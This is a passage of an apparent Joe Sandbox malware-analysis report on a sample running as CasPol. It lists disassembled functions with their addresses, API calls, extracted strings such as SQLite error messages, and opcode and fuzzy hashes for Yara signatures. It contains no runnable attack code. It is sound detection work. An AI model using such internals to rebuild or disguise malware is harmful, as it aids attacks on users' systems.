                                                                                                                                                                                  Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 004082EF
                                                                                                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                  • memset.MSVCRT ref: 00408362
                                                                                                                                                                                  • memset.MSVCRT ref: 00408377
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$ByteCharMultiWide
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 290601579-0
                                                                                                                                                                                  • Opcode ID: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                                                                                                                                                                                  • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                                                                                                                                                                                  • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                                                  Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                  • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                  • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                                                                                                  • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                                                                                                  • memset.MSVCRT ref: 0044505E
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$memchrmemset
                                                                                                                                                                                  • String ID: PD$PD
                                                                                                                                                                                  • API String ID: 1581201632-2312785699
                                                                                                                                                                                  • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                                                  • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                                                                                                  Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                                                                                  • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                                                                                  • GetParent.USER32(?), ref: 00409FA5
                                                                                                                                                                                  • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2163313125-0
                                                                                                                                                                                  • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                  • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                                                                                                  • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                                                                                                  Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: free$wcslen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3592753638-3916222277
                                                                                                                                                                                  • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                                                                                                  • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                                                                                  • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                                                                                  Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                                  • String ID: %s (%s)$YV@
                                                                                                                                                                                  • API String ID: 3979103747-598926743
                                                                                                                                                                                  • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                  • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                  • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                                                  Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                                                                                  • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                                  • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                  • API String ID: 2767993716-572158859
                                                                                                                                                                                  • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                  • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                                                                  Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                                                  • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                                                    • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                  • API String ID: 3176057301-2039793938
                                                                                                                                                                                  • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                                  • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                                  • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                                                                                                  Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                                                  • out of memory, xrefs: 0042F865
                                                                                                                                                                                  • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                                                  • database is already attached, xrefs: 0042F721
                                                                                                                                                                                  • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                                                  • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                                                  • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpymemset
                                                                                                                                                                                  • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                  • API String ID: 1297977491-2001300268
                                                                                                                                                                                  • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                                                                                                  • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                                                                  • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                                                                  Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                                                                                                                                                  • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                                                                                                                                  • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                                                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                                  • String ID: ($d
                                                                                                                                                                                  • API String ID: 1140211610-1915259565
                                                                                                                                                                                  • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                                                                                                                  • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                                                                                                                  • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                                                                                                  Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                                                                  • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                                                                  • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3015003838-0
                                                                                                                                                                                  • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                  • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                  • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                                                                                  Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00407E44
                                                                                                                                                                                  • memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 59245283-0
                                                                                                                                                                                  • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                                                  • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                                                                                                  Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                                                                                  • free.MSVCRT ref: 004185AC
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2802642348-0
                                                                                                                                                                                  • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                                                  • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                                                  • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                                                  • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                                                  Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                                                                                                  • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                                                                                                  • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                  • API String ID: 3510742995-3273207271
                                                                                                                                                                                  • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                  • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                                                                                                  • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                  • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                                                                                                  Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                                                                                                  • memset.MSVCRT ref: 00413ADC
                                                                                                                                                                                  • memset.MSVCRT ref: 00413AEC
                                                                                                                                                                                    • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                  • memset.MSVCRT ref: 00413BD7
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00413C4E
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                                  • String ID: 3A
                                                                                                                                                                                  • API String ID: 3300951397-293699754
                                                                                                                                                                                  • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                  • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                                                                                  Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00411AF6
                                                                                                                                                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                  • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                                                  • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                                  • String ID: AE$.cfg$General$EA
                                                                                                                                                                                  • API String ID: 776488737-1622828088
                                                                                                                                                                                  • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                  • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                                                                                  • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                                                                  Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                                                  • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                                                  • memset.MSVCRT ref: 0040D906
